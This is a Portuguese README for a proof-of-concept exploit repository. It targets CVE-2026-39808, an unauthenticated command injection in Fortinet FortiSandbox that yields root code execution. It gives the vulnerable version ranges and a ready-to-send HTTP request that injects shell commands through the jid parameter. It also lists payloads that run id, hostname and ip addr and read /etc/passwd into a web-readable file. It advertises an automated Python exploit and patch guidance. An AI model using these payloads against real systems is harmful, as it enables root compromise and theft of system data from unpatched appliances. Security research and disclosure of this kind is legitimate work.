
CVE-2026-39808
Este repositório contém uma Prova de Conceito limpa e bem documentada para CVE-2026-39808 — uma vulnerabilidade crítica de injeção de comandos não autenticada no Fortinet FortiSandbox que permite escape de sandbox e execução remota de código como root (uid=0).
jid




Exploração bem-sucedida exibindo uid=0 gid=0 groups=0
| Faixa de Versão | Status |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | Vulnerável |
| FortiSandbox 5.0.0 – 5.0.5 | Vulnerável |
| 4.4.9+ / 5.0.6+ | Corrigida |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
Abra no navegador:
https://your-lab-ip/ng/out.txt
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → Exploit automatizado em Pythonburp-request.txt → Requisição do Burp Suite pronta para usopayloads.md → Coleção de payloads úteisscreenshots/ → Imagens da exploração passo a passoREADME.md → Este arquivoAtualize o FortiSandbox imediatamente para uma das seguintes versões:
A Fortinet lançou patches oficiais que corrigem esta vulnerabilidade.
Feito para Fins de Pesquisa e Aprendizado
⭐ Dê uma estrela neste repositório se ele ajudou você!